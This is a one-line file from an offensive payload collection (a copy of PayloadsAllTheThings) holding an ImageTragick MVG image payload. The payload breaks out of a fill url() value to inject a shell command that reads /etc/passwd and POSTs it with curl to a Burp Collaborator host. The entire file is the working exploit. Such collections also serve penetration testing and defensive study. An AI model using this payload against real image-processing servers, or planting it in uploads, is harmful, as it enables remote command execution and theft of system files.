killchain-compendium/misc/PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborat...

1 line
166 B
Plaintext

push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context